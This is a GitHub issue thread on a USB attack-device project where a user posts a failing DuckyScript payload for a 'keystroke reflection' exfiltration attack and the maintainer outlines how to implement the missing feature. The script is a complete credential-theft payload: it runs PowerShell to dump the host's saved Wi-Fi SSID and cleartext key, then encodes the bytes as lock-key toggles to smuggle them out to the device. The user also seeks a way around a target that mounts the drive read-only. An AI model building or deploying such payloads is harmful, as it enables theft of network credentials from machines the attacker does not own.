i-am-shodan/USBArmyKnife #96: Keystroke Reflection Attack Exfiltration not work.

SnowGlobeio, 2025-02-21:
## Your problem

I would like to test the "keystroke Reflexion Attack".
For that, i used information from this url:
[the-keystroke-reflection-attack](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration#the-keystroke-reflection-attack)

It's appear that the command "SAVE_HOST_KEYBOARD_LOCK_STATE" not worked and log : Script error near line 5

Have you tested it before ? 

## Your device

```
LilyGo T-Dongle S3

```

# Language (HID attacks only)

## Your DuckyScript

```
ATTACKMODE HID
LED_OFF
DELAY 2000

SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE

REM Store the currently connected wireless LAN SSID & Key to %tmp%\z
GUI r
DELAY 100
STRING powershell "netsh wlan show profile name=(Get-NetConnectionProfile)
STRING .Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\z"
ENTER
DELAY 100

REM Convert the stored credentials into CAPSLOCK and NUMLOCK values.
GUI r
DELAY 100
STRING powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,
STRING 0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else
STRING {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\z"
ENTER
DELAY 100

REM Use powershell to inject the CAPSLOCK and NUMLOCK values to the Ducky.
GUI r
DELAY 100
STRING powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;
STRING [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z"
ENTER
DELAY 100

REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.

WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE

```

## Your debug logs

```
ATTACKMODE command
Changing USB mode to HID
Requesting wait for 2000
Failed processing = 'SAVE_HOST_KEYBOARD_LOCK_STATE'

Script error near line 5

```

- I confirm I have read the FAQ:
- I confirm I am using the latest release:

## Additional information

i-am-shodan, 2025-02-21:
SAVE_HOST_KEYBOARD_LOCK_STATE isn't implemented, i'm happy to accept a PR which adds support

SnowGlobeio, 2025-02-23:
I'll try to do something, and i'll try to use this to help me:
[ardiuno-keystroke-reflection](https://github.com/DarkMetalMouse/ardiuno-keystroke-reflect)

i-am-shodan, 2025-02-23:
USB keyboard emulation is provided by my fork of Arduino TinyUSB. The example code here from the upstream repo gives an example of receiving a cap lock report.

https://github.com/adafruit/Adafruit_TinyUSB_Arduino/blob/master/examples/HID/hid_boot_keyboard/hid_boot_keyboard.in

If you're interested in implementing this I would:
* Add code to receive key presses into USBHID.cpp. This should build up a single byte with the caps/num lock presses.
* Add code to USBHID that registers a callback for every byte that is produced as well as when the scroll lock terminator is called.
* Add an DuckyScript extension implementing SAVE_HOST_KEYBOARD_LOCK_STATE in Extensions.cpp. This should open a file with an incrementing file name and register a callback with USBHID.
* The callback writes each byte to a file unless (bool final) is true. Then it closes the file

Besix2, 2025-02-24:
> ## Your problem
> I would like to test the "keystroke Reflexion Attack". For that, i used information from this url: [...]

Just as a question: why do you need to exfiltrate using lock states. Its far easier by mounting a directory and copying it. lockstate is intended for rubber ducky which cant do this.

SnowGlobeio, 2025-02-24:
> 
> Just as a question: why do you need to exfiltrate using lock states. Its far easier by mounting a directory and copying it. lockstate is intended for rubber ducky which cant do this.

Because the système mount on read only the usb Liligo drive. So i need to find an other way to extract info.